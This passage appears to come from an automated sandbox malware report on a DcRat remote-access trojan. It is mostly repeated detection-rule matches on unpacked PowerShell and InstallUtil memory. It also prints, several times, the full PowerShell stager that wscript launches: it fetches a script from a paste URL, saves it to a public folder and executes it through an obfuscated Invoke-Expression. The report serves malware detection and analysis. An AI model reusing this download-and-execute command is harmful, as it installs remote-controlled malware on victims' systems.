Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
